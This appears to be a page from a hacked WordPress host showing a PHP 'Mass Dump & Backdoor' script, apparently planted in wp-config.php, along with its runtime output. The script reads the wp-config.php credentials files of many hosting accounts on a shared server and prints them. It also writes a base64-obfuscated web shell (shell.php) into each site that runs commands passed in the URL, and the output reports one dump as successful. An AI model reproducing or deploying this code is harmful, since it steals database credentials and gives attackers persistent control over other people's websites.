Mass Dump & Backdoor
SUKSES DUMP mobileappdevbal:
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
$users = ['mobileappdevatl','mobileappdevdle','mobileappdevsaf','mobileappdevhuf','mobileappdevbal','mobileappdevny','mobileappdevelop','mobileappdevla','mobileappdevch','mobileappdevos','mobileappdevbus','mobileappdevden','mobileappdevhou','mobileappdevval','mobileappdevcle'];
$base_paths = ['/home/', '/home2/', '/home3/'];
echo "<h1>Mass Dump & Backdoor</h1>";
foreach($base_paths as $base) {
foreach($users as $user) {
$dir = $base . $user . "/public_html";
$cfg = $dir . "/wp-config.php";
if(file_exists($cfg)) {
$isi = file_get_contents($cfg);
echo "<h2>SUKSES DUMP $user:</h2><pre>" . htmlspecialchars($isi) . "</pre><hr>";
// Auto backdoor
$backdoor = $dir . "/shell.php";
$code = "<?php eval(base64_decode('c3lzdGVtKCRfR0VUWzFdKTs=')); ?>"; // simple cmd shell
file_put_contents($backdoor, $code);
echo "<a href='$user_symlink/shell.php?1=whoami' target='_blank'>Backdoor $user</a><br>";
}
}
}
?>
Warning: Undefined variable $user_symlink in /home/mobileappdevbal/public_html/wp-config.php on line 24
Backdoor mobileappdevbal
Fatal error: Uncaught Error: Call to undefined function nocache_headers() in /home/mobileappdevbal/public_html/wp-admin/admin.php:37
Stack trace:
#0 /home/mobileappdevbal/public_html/wp-admin/index.php(10): require_once()
#1 {main}
thrown in /home/mobileappdevbal/public_html/wp-admin/admin.php on line 37